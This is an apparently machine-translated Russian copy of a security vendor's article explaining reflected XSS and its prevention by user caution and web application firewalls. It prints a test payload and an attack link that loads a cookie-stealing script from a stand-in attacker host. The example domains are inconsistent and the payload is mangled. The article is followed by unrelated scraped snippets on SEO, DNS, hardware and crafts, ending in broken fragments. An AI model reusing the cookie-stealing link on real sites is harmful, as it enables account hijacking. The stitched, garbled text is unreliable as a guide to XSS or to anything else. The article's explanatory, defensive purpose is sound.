Отраженный XSS | Как предотвратить непостоянную атаку | Imperva

  1. Что такое XSS-атака Межсайтовый скриптинг (XSS) - это уязвимость веб-приложения, которая позволяет...
  2. Пример отраженной атаки XSS
  3. Отражение и предотвращение атак XSS

Что такое XSS-атака

Межсайтовый скриптинг (XSS) - это уязвимость веб-приложения, которая позволяет злоумышленнику внедрить код (обычно HTML или JavaScript) в содержимое внешнего веб-сайта. Когда жертва просматривает зараженную страницу на веб-сайте, внедренный код выполняется в браузере жертвы. Следовательно, злоумышленник обошел браузер та же политика происхождения и может украсть личную информацию у жертвы, связанной с сайтом.

Что такое отраженная атака XSS?

Отраженные XSS-атаки, также известные как непостоянные атаки, происходят, когда вредоносный скрипт отражается от веб-приложения в браузере жертвы.

Сценарий активируется по ссылке, которая отправляет запрос на веб-сайт с уязвимостью, которая позволяет выполнять вредоносные сценарии. Уязвимость обычно является результатом недостаточной очистки входящих запросов, что позволяет манипулировать функциями веб-приложения и активировать вредоносные сценарии.

Для распространения вредоносной ссылки злоумышленник обычно встраивает ее в электронное письмо или на сторонний веб-сайт (например, в раздел комментариев или в социальные сети). Ссылка встроена в якорный текст, который провоцирует пользователя нажать на нее, что инициирует XSS-запрос к эксплуатируемому веб-сайту, отражая атаку пользователя.

В отличие от хранимой атаки, когда злоумышленник должен найти веб-сайт, который позволяет постоянно внедрять вредоносные сценарии, отраженные атаки требуют только того, чтобы вредоносный сценарий был встроен в ссылку. При этом, чтобы атака была успешной, пользователь должен нажать на зараженную ссылку.

Таким образом, существует ряд ключевых различий между отраженными и сохраненными XSS-атаками, в том числе:

  • Отраженные атаки более распространены.
  • Отраженные атаки не имеют такой же досягаемости, как хранимые XSS-атаки.
  • Бдительные пользователи могут избежать отраженных атак.

С помощью отраженного XSS злоумышленник играет в «игру чисел», отправляя вредоносную ссылку как можно большему числу пользователей, тем самым повышая свои шансы на успешное проведение атаки.

Пример отраженной атаки XSS

При посещении сайта форума, который требует от пользователей входа в свою учетную запись, злоумышленник выполняет этот поисковый запрос <script type = 'text / javascript'> alert ('xss'); </ script>, вызывая следующие вещи:

  1. Запрос создает окно с сообщением: «XSS».
  2. На странице отображается: «<script type = 'text / javascript'> alert ('XSS'); </ script> не найден».
  3. URL страницы гласит: http://ecommerce.com?q=<script type = ”text / javascript”> alert ('XSS'); </ script>.

Это говорит злоумышленнику, что веб-сайт уязвим. Затем он создает свой собственный URL-адрес, который гласит http://forum.com?q=news<\script%20src=аныйhttp://hackersite.com/authstealer.js ”, и встраивает его в качестве ссылки в, казалось бы, безвредном электронная почта, которую он отправляет группе пользователей форума.

Хотя адрес отправителя и строка темы могут показаться подозрительными для некоторых, это не означает, что на них не нажимают.

На самом деле, даже если только один из каждых 1000 получателей электронной почты перейдет по ссылке, это все равно составит несколько десятков зараженных пользователей форума. Они будут перенаправлены на веб-сайт форума, где вредоносный сценарий будет отражен обратно в их браузер, что позволит злоумышленнику украсть сессионные cookie-файлы и взломать их учетные записи на форуме.

Отражение и предотвращение атак XSS

Существует несколько эффективных методов предотвращения и смягчения отраженных XSS-атак.

Прежде всего, с точки зрения пользователя, бдительность - лучший способ избежать сценариев XSS. В частности, это означает, что нельзя нажимать на подозрительные ссылки, которые могут содержать вредоносный код. Подозрительные ссылки включают ссылки, найденные в:

  • Письма от неизвестных отправителей
  • Раздел комментариев сайта
  • Лента в социальных сетях неизвестных пользователей

Сказав это, в конечном итоге это зависит от оператора веб-сайта, чтобы предотвратить потенциальное злоупотребление для своих пользователей.

Кроме того, брандмауэры веб-приложений (WAF) также играют важную роль в смягчении отраженных атак XSS. С помощью правил безопасности на основе сигнатур, поддерживаемых другими эвристиками, WAF может компенсировать отсутствие очистки входных данных и просто блокировать ненормальные запросы. Это включает, но не ограничивается запросами, которые пытаются выполнить отраженную атаку межсайтового скриптинга.

Следует отметить, что в отличие от хранимой атаки, когда вредоносные запросы злоумышленника на веб-сайт блокируются, при отраженной атаке XSS блокируются запросы пользователя. Это сделано для защиты пользователя, а также для предотвращения побочного ущерба для всех других посетителей сайта.

Облако Импервы брандмауэр веб-приложений также использует фильтрацию сигнатур для противодействия отраженному XSS. Кроме того, в WAF используется технология краудсорсинга, которая автоматически собирает и объединяет данные атак по всей сети Imperva для удобства всех пользователей.

Краудсорсинговый компонент службы облачной безопасности Imperva обеспечивает быстрое реагирование на угрозы нулевого дня и защищает все сообщество пользователей от новых угроз. Это также позволяет использовать расширенные эвристические методы защиты, в том числе отслеживающие репутацию IP-адресов, для отслеживания повторных нарушителей и устройств ботнетов.

Похожие

Как избежать вредоносных программ
Вот наиболее распространенные способы заражения вашего компьютера вредоносным ПО: Устаревшие антивирусные и непатентованные устройства . Единственное наиболее важное действие, которое пользователь компьютера может сделать, чтобы сохранить защиту, - это использовать современную антивирусную защиту и устанавливать исправления / обновления на ваше устройство. Обновите прикладное программное обеспечение с помощью новейших исправлений. Всегда
Когда DNS-атаки попадают на ваш сайт: что вы можете с этим сделать
В пятницу 21 октября 2016 г. DDoS-атака закрыла несколько популярных интернет-сайтов , Пользователи испытывали медленный доступ к сервисам Twitter, Spotify, Shopify, SoundCloud, Reddit, The New York Times и другим. Отключение - три волны сбоев - было результатом глобальной DDoS-атаки на Dyn, службу доменных имен, используемую этими сайтами. Дин смог
Посмотрите, как сделать сайт бесплатно
Итак, вам интересно, как сделать сайт? Лучшее: в одиночку, бесплатно и быстро? Вы пришли в нужное место. Потратьте около десятка минут, чтобы прочитать это руководство, благодаря которому вы узнаете, как сделать сайт бесплатно. Создание сайтов проще, чем вы думаете! В этом руководстве вы узнаете: - Как сделать сайт за несколько минут с помощью создателя сайта. - Как сделать сайт самостоятельно, не платя тысячи злотых компании,
Как записать звук с компьютера
Если вы хотите записывать звуки и музыку, воспроизводимые на вашем компьютере, вам не нужно устанавливать какие-либо дополнения или программы. Всего несколько кликов в настройках компьютера. Запись звука на компьютер может быть полезна, если вы хотите быстро зарегистрировать голосовой вызов из программы обмена мгновенными сообщениями или части радиопрограммы. Практически мы можем записывать каждый звук, музыку и т. Д., Которые воспроизводятся на компьютере.
HDMI 2.1: здесь есть все, что нужно знать о новом стандарте
Что такое HDMI 2.1? Новый стандарт для разъемов HDMI был подтвержден еще в ноябре 2017 года, но до сих пор не внедрен в массовое телевизионное оборудование. Но когда это произойдет, это станет большим шагом как для AV-индустрии, так и для домашних зрителей, желающих получить максимум от своих сериалов, фильмов, передач и игровых приставок. Когда впервые появился мультимедийный интерфейс высокой четкости (или HDMI), все радовались тому, что больше не нужно больше использовать громоздкие
Что такое метатеги и имеют ли значение метатеги?
До недавнего времени описание сайта, популярный метатег Description, играло значительную роль с точки зрения позиционирование страниц , Он оказал значительное влияние на результаты поиска, поэтому до предела он был насыщен ключевыми фразами, подходящими для данной подстраницы. Несколько лет назад ситуация кардинально изменилась - сегодня, согласно информации от Google, ее вес с точки зрения SEO равен нулю. Это не значит, однако, что его не
Как сделать конверт из бумаги А4?
Интересный конвертик с листа А4 может стать прекрасным дополнением для любого подарка. Даже сама ненужная вещь, упакованная в самодельный красивый конверт, станет хорошим жестом, который выразит ваше уважение и любовь к получателю. Такой конверт может сделать практически каждый человек! Поделка конвертов из бумаги А4 - стартовый уровень оригами. Что Вам понадобится для того, чтобы сделать конверт? Сразу стоит отметить, что не смотря на значительный размер
Что такое отравление DNS-кэша?
Отравление кэша DNS, также известное как спуфинг DNS, - это тип атаки, использующий уязвимости в системе доменных имен (DNS), чтобы отвлечь интернет-трафик от законных серверов и сделать их поддельными.
Windows 10, как выйти из Магазина Windows
В этом руководстве мы покажем вам, как легко выйти из Магазина Windows в Windows 10. Если вам не нужно использовать репозиторий с играми и приложениями в Windows, вы можете быстро избавиться от этого инструмента. Приглашаем вас ознакомиться с нашим гидом. Для использования Магазина Windows у нас должна быть учетная запись Microsoft ID. При первом входе в Windows 10 вы не только создаете имя входа в систему, но и позже используете его для использования
Как добавить 360-градусную графику в Facebook
... пример, 6000 пикселей на 3000 пикселей. Графика / Фотографии, добавленные в виде 360 градусов, должны быть сохранены в формате JPEG. Facebook умный, и он просто не превратит нас в графику в правильном формате для 360 изображений, нам нужно предоставить нашу фотографию с правильными метаданными. Для этого нам понадобится программа, которая доступна онлайн, но мы попадем к ней в руководстве - это легко и просто! Шаг 1 - дизайн
Позиционирование в Google
Что такое позиционирование? Высокая позиция сайта в поисковой системе чрезвычайно важна с деловой точки зрения. При поиске информации пользователь интернета часто ограничивается только первой страницей

Комментарии

ЧТО ТАКОЕ DNS?
ЧТО ТАКОЕ DNS? Система доменных имен - в польской системе перевода доменных имен. DNS идентифицирует имена интернет-доменов и их ссылки на IP-адреса, обменивает адреса (доменные имена), общеизвестные, например, shoper.pl, на IP-адреса, действительные в компьютерных сетях, например, 62 129 244,68 . С технической точки зрения это система протоколов, серверов и сервисов, которые поддерживают базу данных сетевых адресов.
Что это такое и как его использовать?
Что это такое и как его использовать? Маршрутизатор распределяет сигнал нашего интернет-провайдера на все устройства, которые могут использовать ресурсы «глобальной деревни». Благодаря этому мы можем подключить к Интернету несколько настольных компьютеров,
Как это сделать, так как все уже было там?
Как это сделать, так как все уже было там? Ну, просто чтобы освежить давно забытые пятерки на 360 градусов на FB. Раньше вам приходилось делать 360-градусную фотографию, чтобы Facebook мог интерпретировать ее как панорамное изображение, но если бы мы захотели вставить изображение, была проблема, которую я решу в этом посте. Благодаря этому вы сможете удивиться вашим творческим возможностям. Это отличный способ оживить вашу корпоративную страницу или профиль. Вы можете представить свои фотографии,
» Что это значит и как вернуть деньги?
» Что это значит и как вернуть деньги? Такая ситуация может возникнуть в случае сбоя работы системы, например, Вы оплачиваете заказ, и при оплате на экране возникает сообщение об ошибке. Вы начинаете оплату заново, и сумма дважды снимается с Вашей платежной карточки. Так как заказ можно оплатить только один раз, сумма автоматически попадает на Ваш лицевой счет, который закреплен за e-mail, который Вы указали при оформлении заказа. Вы можете воспользоваться личным счетом для оплаты
Хотите увидеть, как это делают блоггеры и влогеры, у которых больше всего фанатов?
Хотите увидеть, как это делают блоггеры и влогеры, у которых больше всего фанатов? Взгляните на профиль Abstrachuje TV, Maffashion и Анны Левандовской. Это самые популярные профили в Польше. Помните, однако, что успех зависит не только от количества лайков, но и от того, сможете ли вы создать уникальный имидж и завоевать группу преданных, настоящих и преданных фанатов. Автор:
Но вы когда-нибудь задумывались, как далеко находятся звезды и как далеко измеряется это расстояние?
Но вы когда-нибудь задумывались, как далеко находятся звезды и как далеко измеряется это расстояние? Это тема для одного из следующих эпизодов «Мир за три минуты». Я приглашаю тебя 🙂 Подписка на новости: Itunes | андроид | RSS подача Графика, изображающая прецессию Земли: По Tfr000 (разговор)
Как это предотвратить?
Как это предотвратить? Для начала стоит выяснить, от чего зависит время загрузки. На него влияют две группы параметров: сетевые и аппаратные. Важное значение имеет расстояние между компьютером клиента и сервером, на котором размещен веб-сайт. Поэтому, направляя свой бизнес клиентам из Польши, стоит выбрать решение, которое будет работать на серверах, расположенных также в Польше. Это сэкономит вам от нескольких десятков до нескольких сотен миллисекунд на каждый
Позиционирование по словам Дэвида - не что иное, как ответ на вопрос «Какими свойствами обладает продукт и для кого он предназначен?
Позиционирование по словам Дэвида - не что иное, как ответ на вопрос «Какими свойствами обладает продукт и для кого он предназначен?» Ища эти ответы, он создал гениальное мыло Dove для женщин с сухой кожей в сознании потребителей. Хотя он признался, когда получил их, он мог сделать с этим что угодно. Например, продавать в качестве моющего средства для мужчин с грязными руками. Магия? Нет, это мощная сила позиционирования.
Как это возможно?
Как это возможно? Ну, секрет кроется в правильном позиционировании сайта. Благодаря броским ключевым фразам, таким как «автодилер + город», ваш сайт будет отображаться первым среди других похожих тем. Кроме того, если вы покупаете подписку, мы будем постоянно повышать позицию вашего сайта и придумывать дополнительные ключевые слова. С нами вы будете блистать в мире автомобилей! Местное расположение: Уход за детьми. Цена. Забота о ребенке - это настоящий вызов. Так
Что такое метатеги?
Что такое метатеги? Описание мета-тега, как и другие мета-теги, является фрагментом HTML-кода, доступного в разделе заголовка , и отвечает за описание содержимого веб-сайта. С технической стороны это выглядит так: <META name = "Description" content = "описание страницы, относящееся к ее содержанию"> Несколько лет назад описание страницы, как и ключевые слова метатега, оказало значительное влияние на ее положение в результатах поиска. Позиционеры,
Был ли это действительно инцидент, так как через несколько дней на домашней странице я снова заметил похожую рекламу?
Был ли это действительно инцидент, так как через несколько дней на домашней странице я снова заметил похожую рекламу? «Этот метод удаляет

Что такое отраженная атака XSS?
Com?
Com?
Лучшее: в одиночку, бесплатно и быстро?
Что Вам понадобится для того, чтобы сделать конверт?
ЧТО ТАКОЕ DNS?
Что это такое и как его использовать?
Что это такое и как его использовать?
Как это сделать, так как все уже было там?
» Что это значит и как вернуть деньги?